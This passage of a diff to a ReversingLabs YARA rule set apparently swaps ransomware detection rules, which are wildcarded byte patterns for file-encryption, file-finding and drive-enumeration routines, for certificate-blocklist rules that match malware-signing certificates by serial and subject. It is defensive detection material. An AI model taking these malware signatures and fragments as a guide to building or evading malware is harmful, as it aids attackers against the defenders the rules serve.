-            24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 5E
-            33 C0 5B 8B E5 5D C3
-        }
-		$encrypt_files_1 = {
-            55 8B EC 83 EC ?? 53 57 68 ?? ?? ?? ?? 8B FA 8B D9 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? FF
-            15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 5F 33 C0 5B 8B E5 5D C3
-            56 8D 45 ?? 33 F6 50 56 56 57 53 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 56 8D 45 ??
-            C7 45 ?? ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 8B 45 ?? 68 ??
-            ?? ?? ?? 50 FF 75 ?? C7 00 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? 8B F0
-            FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B C6 5E 5F 5B 8B E5 5D C3
-        }
-		$encrypt_files_2 = {
-            55 8B EC 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B DA 8B F9 FF 15 ?? ??
-            ?? ?? 57 8B F0 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 83 C4 ?? 8B CF E8 ?? ?? ?? ?? 85
-            C0 74 ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 33 C0 5F 5E 5B 5D C3 8B CF E8 ??
-            ?? ?? ?? 85 C0 75 ?? 83 7B ?? ?? 72 ?? 8B 55 ?? 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? 56
-            57 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 56 FF 15 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ??
-            5B 5D C3
-        }
-		$encrypt_files_3 = {
-            55 8B EC 83 EC ?? 56 57 E8 ?? ?? ?? ?? 85 C0 75 ?? 83 C8 ?? 5F 5E 8B E5 5D C3 8D 45
-            ?? 50 8D 45 ?? 50 8D 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 8D 4D ?? 8B D7 E8
-            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 74 ??
-            C6 04 08 ?? 8B 4D ?? 68 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75
-            ?? FF D6 8B CF E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 05 ?? ?? ?? ??
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 75 ?? FF D6 68 ?? ?? ?? ?? 6A ??
-            57 FF D6 5F 33 C0 5E 8B E5 5D C3
-        }
-		$enum_resources_1 = {
-            55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 8B 3D ?? ?? ?? ?? 8B F1 6A ?? 68 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? 89 54 24 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? FF D7 8B 1D ?? ??
-            ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 85 F6 0F 85 ?? ??
-            ?? ?? 8D 44 24 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF D3 85 C0 0F 85 ?? ?? ?? ?? 8D 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF
-            74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 49 ?? 33 DB 39 5C 24 ?? 0F 86
-            ?? ?? ?? ?? 8B 74 24 ?? 83 C6 ?? 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ??
-            6A ?? 57 FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ??
-            8D 4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8D 44 24 ?? C7 44 24
-            ?? ?? ?? ?? ?? 50 FF 74 24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ?? FF
-        }
-		$enum_resources_2 = {
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8B 74 24 ?? FF 74 24 ?? FF
-            15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 6A ?? 6A ?? 6A ?? FF D3 8B F0 85 F6 0F 85 ?? ?? ??
-            ?? 8B 74 24 ?? 8D 44 24 ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 FF 74 24 ??
-            C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 9B ?? ?? ?? ??
-            33 DB 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 83 C6 ?? 90 83 7E ?? ?? 75 ?? 8B 06 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 89 44 24 ?? FF D7 8B F8 85 FF 74 ?? FF 74 24 ?? 68 ??
-            ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8B 55 ?? 83 C4 ?? 8B CF 6A ?? E8 ?? ?? ?? ?? 83 C4 ??
-            68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? F6 46 ?? ?? 74 ?? FF 75 ?? 8B 54 24 ?? 8D
-            4E ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 3D ?? ?? ?? ?? 43 83 C6 ?? 3B 5C 24 ?? 72 ?? 8B 74
-            24 ?? 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 50 56 8D 44 24 ?? C7 44 24 ?? ?? ?? ?? ??
-            50 FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 74 24
-            ?? FF 15 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 5F 8B
-            C6 5E 5B 8B E5 5D C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB9\\xBF\\xE5\\xB7\\x9E\\xE6\\x98\\x8A\\xE5\\x8A\\xA8\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "46:31:71:3e:66:e9:13:47:f0:38:8b:98:cf:74:77:94" and 1488240000 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "4cbc6cc9-1795-5d43-84a1-dd835d7ef349"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12480-L12498"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b7c715e28f003351d10ba53657e9e667b635a0e4433276d91d26f4482a61191d"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $enum_resources_* ) ) and ( $find_files ) and ( all of ( $encrypt_files_* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Max Steinhard" and ( pe.signatures [ i ] . serial == "00:e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" or pe.signatures [ i ] . serial == "e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" ) and 1656288000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_EAF : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects EAF ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6903030e-b1a1-5238-b377-ce8e4b18d3f3"
-		date = "2022-07-22"
-		modified = "2022-07-22"
+		id = "b69a4e06-a732-5462-b2b1-bdde3fd34e31"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.EAF.yara#L1-L89"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3d10c852f95e8aa9bcd3543b96650b98ac57bcd2aa2b374e0badb63b5a4c0396"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12500-L12516"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "caff0cbca45c0dffb673367585824783371f2f4e31a0c9629afb7de708098892"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "EAF"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            00 03 28 ?? ?? ?? ?? 0A 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 39 ?? ?? ?? ?? 00 7E ??
-            ?? ?? ?? 0C 03 28 ?? ?? ?? ?? 0D 03 28 ?? ?? ?? ?? 13 ?? 1E 8D ?? ?? ?? ?? 25 16 11 ??
-            A2 25 17 72 ?? ?? ?? ?? A2 25 18 7E ?? ?? ?? ?? A2 25 19 72 ?? ?? ?? ?? A2 25 1A 28 ??
-            ?? ?? ?? A2 25 1B 72 ?? ?? ?? ?? A2 25 1C 09 A2 25 1D 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ??
-            13 ?? 02 03 11 ?? 08 28 ?? ?? ?? ?? 13 ?? 11 ?? 2D ?? 06 72 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            2B ?? 16 13 ?? 11 ?? 2C ?? 00 00 03 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 DE ?? 00
-            00 00 DE ?? 26 00 00 DE ?? 2A
-        }
-		$encrypt_files_p2 = {
-            00 03 19 73 ?? ?? ?? ?? 0A 00 04 18 73 ?? ?? ?? ?? 0B 00 06 16 6A 6F ?? ?? ?? ?? 00 28
-            ?? ?? ?? ?? 0C 00 1F ?? 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 05 09 73 ??
-            ?? ?? ?? 13 ?? 00 08 17 6F ?? ?? ?? ?? 00 08 18 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 00 08 11 ?? 1F ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 07 08 6F ??
-            ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ?? 00 20 ?? ?? ?? ?? 13 ?? 11 ?? 8D ?? ?? ?? ?? 13 ?? 16
-            13 ?? 00 06 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 13
-            ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ??
-            32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16
-            11 ?? 6F ?? ?? ?? ?? 00 00 2B ?? 11 ?? 20 ?? ?? ?? ?? 32 ?? 11 ?? 20 ?? ?? ?? ?? FE 02
-            16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 2B ??
-            00 07 11 ?? 16 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 11 ?? 58 13 ?? 00 11 ?? 16 FE 03 13 ??
-            11 ?? 3A ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ??
-            00 DC 00 DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? 00 DC 00 DE ?? 08 2C ?? 08 6F ?? ?? ??
-            ?? 00 DC 07 6F ?? ?? ?? ?? 00 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 06 6F ?? ?? ??
-            ?? 00 00 DE ?? 06 2C ?? 06 6F ?? ?? ?? ?? 00 DC 03 28 ?? ?? ?? ?? 00 17 13 ?? DE ?? 26
-            00 16 13 ?? DE ?? 11 ?? 2A
-        }
-		$find_files_p1 = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 16 0C 38 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0D 00 09 06 08 9A
-            28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 06 08 9A 28 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 09 FE 06 ??
-            ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 09 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ??
-            ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 11 ?? 7E ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 06 08 9A 6F ?? ?? ?? ?? 00 00 00 08 17
-            58 0C 08 06 8E 69 FE 04 13 ?? 11 ?? 3A ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 16
-            13 ?? 2B ?? 00 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 07 11 ?? 9A 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 2B ?? 16 13 ?? 11 ?? 2C ?? 00 07 11 ?? 9A 28 ?? ?? ?? ?? 00
-            00 00 11 ?? 17 58 13 ?? 11 ?? 07 8E 69 FE 04 13 ?? 11 ?? 2D ?? 00 DE ?? 26 00 00 DE ??
-            2A
-        }
-		$find_files_p2 = {
-            00 28 ?? ?? ?? ?? 0A 16 0B 2B ?? 73 ?? ?? ?? ?? 0C 08 06 07 9A 7D ?? ?? ?? ?? 00 08 7B
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 08 7B ?? ?? ?? ?? 6F ??
-            ?? ?? ?? 2B ?? 16 0D 09 2C ?? 00 08 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 00 00 00 07 17 58 0B 07 06 8E 69 32 ?? 00 DE ?? 26 00 00 DE ?? 2A
-        }
-		$destroy_exe_file = {
-            00 1F ?? 28 ?? ?? ?? ?? 0A 72 ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 7E ??
-            ?? ?? ?? 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 08 72 ?? ?? ?? ?? 1B 8D ??
-            ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 06 A2 25 18 72 ?? ?? ?? ?? A2 25 19 28 ?? ?? ??
-            ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 08 6F ?? ?? ?? ?? 00 00
-            DE ?? 26 00 00 DE ?? 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "M-Trans Maciej Caban" and pe.signatures [ i ] . serial == "6e:44:fc:ed:d4:9f:22:f7:a2:8c:ec:c9:91:04:f6:1a" and 1672923378 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "88dedb69-52f4-59d3-b397-6a091a866cc5"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12518-L12534"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a9d8e9db453f40e32a0cb6412db8885db54053fdf3d7908b884361a493f97b1f"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $destroy_exe_file )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kancelaria Adwokacka Adwokat Aleksandra Krzemi\\xC5\\x84ska" and pe.signatures [ i ] . serial == "35:b4:9e:e8:70:ae:a5:32:e6:ef:0a:49:87:10:5c:8f" and 1663151018 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Gomer : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Gomer ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b76ac856-2abe-531d-b093-461569b9afb7"
-		date = "2020-10-08"
-		modified = "2020-10-08"
+		id = "1bf4b84b-4a32-5908-8ccb-9fce2e5944e6"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Gomer.yara#L1-L106"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a53d37fcb877a12a4969a6ea1aaa67fc4106c3fbdd80a4fd39ad5a66a9df47fc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L12536-L12552"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "091d00b0731f0a3d9917eee945249f001e4b5b1b603cad2fc21eed70ec86aa99"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Gomer"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
-            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
-            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
-            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
-            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
-            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
-            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
-            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
-            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
-        }
-		$find_files_p2 = {
-            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
-            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
-            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
-            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
-            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
-            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
-            83 C4 ?? E9
-        }
-		$encrypt_files = {
-            55 8B EC 51 8B 45 ?? 53 56 57 8B F9 8B 4F ?? 89 4D ?? 3B C1 77 ?? 8B DF 83 F9 ?? 72
-            ?? 8B 1F 8D 34 00 89 47 ?? 56 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 1E
-            8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F0 83 CE ?? 81
-            FE ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B D1 B8 ?? ?? ?? ?? D1 EA 2B C2 3B C8 76
-            ?? BE ?? ?? ?? ?? EB ?? 8D 04 0A 3B F0 0F 42 F0 8D 46 ?? 8D 0C 00 3D ?? ?? ?? ?? 76
-            ?? 83 C9 ?? EB ?? 81 F9 ?? ?? ?? ?? 72 ?? 8D 41 ?? 83 CA ?? 3B C1 0F 46 C2 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 58 ?? 83 E3 ?? 89 43 ?? EB ?? 85 C9 74 ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B D8 EB ?? 33 DB 8B 45 ?? 89 77 ?? 89 47 ?? 8D 34 00 56 FF 75 ??
-            53 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 66 89 04 1E 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ??
-            ?? ?? 8B 07 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ??
-            8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1F 8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? CC CC CC CC CC B8 ?? ?? ?? ?? C3
-        }
-		$enum_drives_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
-            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? 33 C0 C7
-            45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6
-            45 ?? ?? BF ?? ?? ?? ?? 8D 45 ?? 0F A3 38 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D
-            47 ?? 0F 43 4D ?? 66 89 01 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83
-            F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? 66 89 4D ?? C6 45 ?? ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ??
-            83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D
-            ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ??
-            ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE C6 45 ?? ?? F7 E9 83 C4 ?? C1 FA ?? 8B DA C1 EB
-            ?? 03 DA 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
-            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
-            ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ??
